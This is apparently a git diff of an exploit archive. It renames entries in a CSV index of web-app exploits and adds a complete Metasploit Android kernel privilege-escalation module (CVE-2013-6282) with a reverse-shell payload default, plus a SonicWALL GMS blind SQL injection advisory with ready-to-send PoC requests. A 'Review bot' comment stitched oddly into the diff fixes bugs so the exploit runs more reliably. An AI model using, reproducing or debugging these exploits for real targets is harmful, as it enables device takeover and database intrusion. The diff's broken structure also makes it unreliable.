 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin",2008-10-23,"CWH Underground",php,webapps,0
 6821,platforms/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,php,webapps,0
-6822,platforms/php/webapps/6822.txt,"websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps,0
+6822,platforms/php/webapps/6822.txt,"WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps,0
 6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0
 6826,platforms/php/webapps/6826.txt,"Joomla! Component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0
 6827,platforms/php/webapps/6827.txt,"Joomla! Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0
-6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0
+6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'url' Parameter SQL Injection",2008-10-24,yassine_enp,php,webapps,0
 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0
 6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0
 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Parameter Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0
 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0
 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0
 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0
-6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - 'mediaHolder.php id' SQL Injection",2008-10-26,boom3rang,php,webapps,0
-6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - 'forum.php id' SQL Injection",2008-10-26,Hurley,php,webapps,0
+6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - SQL Injection",2008-10-26,boom3rang,php,webapps,0
+6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - SQL Injection",2008-10-26,Hurley,php,webapps,0
 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0
 6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution",2008-10-26,S0l1D,cgi,webapps,0
 6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - (padmin) Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0
@@ -19748,7 +19749,7 @@ id,file,description,date,author,platform,type,port
 6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0
 6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,php,webapps,0
 6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0
-6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - (category_id) Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0
+6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0
 6853,platforms/php/webapps/6853.txt,"questcms - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps,0
 6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps,0
 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0
@@ -20067,7 +20068,7 @@ id,file,description,date,author,platform,type,port
 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0
 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0
 7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0
-7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0
+7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0
 7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0
 7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
@@ -20618,7 +20619,7 @@ id,file,description,date,author,platform,type,port
 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0
 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0
-8002,platforms/php/webapps/8002.txt,"CafeEngine - 'index.php catid' SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
+8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0
 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0
 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
@@ -21422,7 +21423,7 @@ id,file,description,date,author,platform,type,port
 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0
 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0
 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0
-9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0
+9356,platforms/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0
 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0
 9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0
 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,php,webapps,0
@@ -23353,7 +23354,7 @@ id,file,description,date,author,platform,type,port
 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps,0
 13762,platforms/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,php,webapps,0
 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0
-13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps,0
+13769,platforms/php/webapps/13769.txt,"CafeEngine 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps,0
 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0
 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0
 13772,platforms/php/webapps/13772.txt,"Rayzz Photoz - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps,0
@@ -27559,8 +27560,8 @@ id,file,description,date,author,platform,type,port
 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - default.asp Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0
 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0
 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Inclusion",2005-04-26,"Max Cerny",php,webapps,0
-25532,platforms/php/webapps/25532.txt,"Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0
-25533,platforms/php/webapps/25533.txt,"Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0
+25532,platforms/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0
+25533,platforms/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0
 25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0
 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0
 25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0
@@ -28980,9 +28981,9 @@ id,file,description,date,author,platform,type,port
 27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0
 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0
 27367,platforms/php/webapps/27367.txt,"Link Bank - Iframe.php Cross-Site Scripting",2006-03-07,Retard,php,webapps,0
-27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - podcast.php id Parameter SQL Injection",2006-03-07,tzitaroth,php,webapps,0
+27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - 'podcast.php' SQL Injection",2006-03-07,tzitaroth,php,webapps,0
 27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php' template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0
-27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - backend_settings.php language Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0
+27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0
 27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - deleteuser.php user Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0
 27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - viewuser.php hits Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0
 27373,platforms/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0
@@ -29309,7 +29310,7 @@ id,file,description,date,author,platform,type,port
 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0
 27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0
 27804,platforms/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Parameter Cross-Site Scripting",2006-05-03,d4igoro,php,webapps,0
-27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - show.php Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0
+27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0
 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injection",2006-05-03,almaster,php,webapps,0
 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0
 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - dlisting.php cid Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0
@@ -29639,7 +29640,7 @@ id,file,description,date,author,platform,type,port
 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0
 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps,0
 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0
-28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - Myevent.php Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0
+28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0
 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0
 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0
 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0
@@ -32192,12 +32193,12 @@ id,file,description,date,author,platform,type,port
 32141,platforms/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0
 32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0
 32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps,0
-32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
-32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
-32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
-32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
-32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
-32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
+32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
 32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 - 'connector.php' Local File Inclusion",2008-08-04,"Sina Yazdanmehr",php,webapps,0
 32151,platforms/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0
 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80
@@ -32489,8 +32490,8 @@ id,file,description,date,author,platform,type,port
 32636,platforms/php/webapps/32636.txt,"Orkut Clone - profile_social.php id Parameter SQL Injection",2008-12-02,d3b4g,php,webapps,0
 32637,platforms/php/webapps/32637.txt,"Orkut Clone - profile_social.php id Parameter Cross-Site Scripting",2008-12-02,d3b4g,php,webapps,0
 32638,platforms/php/webapps/32638.txt,"Horde Webmail 5.1 - Open Redirect",2014-04-01,"felipe andrian",php,webapps,0
-32639,platforms/php/webapps/32639.txt,"yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0
-32640,platforms/php/webapps/32640.txt,"yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0
+32639,platforms/php/webapps/32639.txt,"Yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0
+32640,platforms/php/webapps/32640.txt,"Yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0
 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps,0
 32642,platforms/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0
 32644,platforms/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443
@@ -35809,12 +35810,10 @@ id,file,description,date,author,platform,type,port
 38178,platforms/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0
 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution",2015-09-14,xistence,multiple,webapps,0
 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0
-38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
 38176,platforms/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0
-38181,platforms/php/webapps/38181.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
-38182,platforms/php/webapps/38182.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
-38183,platforms/php/webapps/38183.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
-38184,platforms/php/webapps/38184.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
+38182,platforms/php/webapps/38182.txt,"tinybrowser - 'type' Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
+38183,platforms/php/webapps/38183.txt,"tinybrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,php,webapps,0
+38184,platforms/php/webapps/38184.txt,"tinybrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,php,webapps,0
 38187,platforms/php/webapps/38187.txt,"WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
 38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted Arbitrary File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80
 38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0
@@ -36926,3 +36925,8 @@ id,file,description,date,author,platform,type,port
 40969,platforms/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",php,webapps,0
 40971,platforms/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",php,webapps,0
 40972,platforms/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",php,webapps,0
+40973,platforms/php/webapps/40973.txt,"Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection",2016-12-28,qemm,php,webapps,0
+40974,platforms/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution (Python)",2016-12-29,anarc0der,php,webapps,0
+40976,platforms/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,php,webapps,0
+40977,platforms/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,hardware,webapps,0
+40978,platforms/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,hardware,webapps,0
diff --git a/platforms/android/local/40975.rb b/platforms/android/local/40975.rb
new file mode 100755
index 000000000..0a3a7df3d
--- /dev/null
+++ b/platforms/android/local/40975.rb
@@ -0,0 +1,81 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, { + 'Name' => "Android get_user/put_user Exploit", + 'Description' => %q{ + This module exploits a missing check in the get_user and put_user API functions + in the linux kernel before 3.5.5. The missing checks on these functions + allow an unprivileged user to read and write kernel memory. + This exploit first reads the kernel memory to identify the commit_creds and + ptmx_fops address, then uses the write primitive to execute shellcode as uid 0. + The exploit was first discovered in the wild in the vroot rooting application. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'fi01', # libget_user_exploit / libput_user_exploit + 'cubeundcube', # kallsyms_in_memory + 'timwr', # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-6282' ], + [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2434453' ], + [ 'URL', 'https://github.com/fi01/libget_user_exploit' ], + [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2565758' ], + ], + 'DisclosureDate' => "Sep 06 2013", + 'SessionTypes' => [ 'meterpreter' ], + "Platform" => [ "android", "linux" ], + 'Targets' => [[ 'Automatic', { }]], + 'Payload' => { 'Space' => 2048, }, + 'DefaultOptions' => + { + 'WfsDelay' => 120, + 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp', + }, + 'DefaultTarget' => 0, + } + )) + end + + def exploit + local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2013-6282.so" ) + exploit_data = File.read(local_file, {:mode => 'rb'}) + + space = payload_space + payload_encoded = payload.encoded + + # Substitute the exploit shellcode with our own + exploit_data.gsub!("\x90" * 4 + "\x00" * 
(space - 4), payload_encoded + "\x90" * (payload_encoded.length - space)) + + workingdir = session.fs.dir.getwd + remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" + write_file(remote_file, exploit_data) + + print_status("Loading exploit library #{remote_file}") + session.core.load_library( + 'LibraryFilePath' => local_file, + 'TargetFilePath' => remote_file, + 'UploadLibrary' => false, + 'Extension' => false, + 'SaveToDisk' => false + ) + print_status("Loaded library #{remote_file}, deleting") + session.fs.file.rm(remote_file) + print_status("Waiting #{datastore['WfsDelay']} seconds for payload") + end + +end diff --git a/platforms/hardware/webapps/40977.txt b/platforms/hardware/webapps/40977.txt new file mode 100755 index 000000000..4b0b98317 --- /dev/null +++ b/platforms/hardware/webapps/40977.txt 
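Review bot: The padding term in `exploit`, `"\x90" * (payload_encoded.length - space)`, has the wrong sign: whenever the encoded payload is shorter than `space`, `String#*` receives a negative count and raises ArgumentError before anything is written. Metasploit normally NOP-pads `payload.encoded` up to `Space`, so this usually evaluates to `* 0` and goes unnoticed, but the expression the comment describes is `"\x90" * (space - payload_encoded.length)`. In the same statement `gsub!` returns nil when the stub pattern is absent from the bundled `.so`, and nothing checks that, so a mismatched data file would be uploaded and loaded unmodified with only the success messages printed; guarding it with `fail_with(Failure::Unknown, "Shellcode stub not found in #{local_file}") unless exploit_data.gsub!(...)` makes the failure visible in the session log instead of silent.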
@@ -0,0 +1,112 @@ + +Dell SonicWALL Global Management System GMS 8.1 Blind SQL Injection + + +Vendor: Dell Inc. +Product web page: https://www.sonicwall.com/products/sonicwall-gms/ +Affected version: 8.1 + 8.0 SP1 Build 8048.1410 + Flow Server Virtual Appliance + +Fixed in: 8.2 (VR-2016-01-C0V) + +Summary: Provide your organization, distributed enterprise or managed +service offering with an intuitive, powerful way to rapidly deploy and +centrally manage SonicWall solutions, with SonicWall GMS. Get more value +from your firewall, secure remote access, anti-spam, and backup and recovery +solutions with enhanced network security monitoring and robust network +security reporting. By deploying GMS in an enterprise, you can minimize +administrative overhead by streamlining security appliance deployment +and policy management. + +Desc: Dell SonicWALL GMS suffers from multiple SQL Injection vulnerabilities. +Input passed via the GET parameters 'searchBySonicwall', 'firstChangeOrderID', +'secondChangeOrderID' and 'coDomainID' is not properly sanitised before being +returned to the user or used in SQL queries. This can be exploited to manipulate +SQL queries by injecting arbitrary SQL code. 
+ +Tested on: SonicWALL + MySQL/5.0.96-community-nt + Apache-Coyote/1.1 + Apache Tomcat 6.0.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5388 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5388.php + +Vendor: https://support.sonicwall.com/product-notification/215257?productName=SonicWALL%20GMS + + +26.01.2016 + +-- + + +Blind SQL Injection via several parameters: + +- searchBySonicwall (GET) +- coDomainID (GET) +- firstChangeOrderID (GET) +- secondChangeOrderID (GET) + + +PoC: + +#1 + +GET /sgms/TaskViewServlet?page=taskView&level=1&node_id=null&screenid=15200&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null'%2b(select*from(select(sleep(6)))a)%2b' HTTP/1.1 +Host: 127.0.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 +Referer: http://127.0.0.1/sgms/content.jsp +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3 +Connection: close + + +#2 + +GET /sgms/Logs?page=logView&searchByCO=Workflow%20Change%20Order%20Example&coDomainID=DMN0000000000000000000000001'%2b(select*from(select(sleep(6)))a)%2b'&level=1&node_id=null&screenid=15150&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null HTTP/1.1 +Host: 127.0.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 +Referer: http://127.0.0.1/sgms/content.jsp +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; 
